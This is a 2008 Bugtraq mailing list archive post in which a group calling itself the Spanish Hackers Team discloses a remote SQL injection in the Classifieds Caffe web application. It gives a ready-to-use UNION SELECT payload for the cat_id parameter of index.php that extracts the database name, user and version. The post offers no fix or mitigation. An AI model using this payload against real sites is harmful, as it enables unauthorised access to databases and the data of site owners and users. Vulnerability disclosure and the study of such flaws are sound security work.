Bugtraq mailing list archives
Classifieds Caffe (index.php cat_id) Remote SQL Injection
From: sys-project () hotmail com
Date: 16 Apr 2008 20:16:26 -0000
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ Classifieds Caffe (index.php cat_id) Remote SQL Injection +==-- --==+====================================================================================+==-- [+] [JosS] + [Spanish Hackers Team] + [Sys - Project] [+] Info: [~] Software: Classifieds Caffe [~] Exploit: Remote SQL Injection [High] [~] Where: index.php [~] Bug Found By: JosS [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [+] Exploit: [~] /index.php?action=add&cat_id=[SQL] [~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3/* --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ JosS +==-- --==+====================================================================================+==-- [+] [The End]
Current thread:
- Classifieds Caffe (index.php cat_id) Remote SQL Injection sys-project (Apr 16)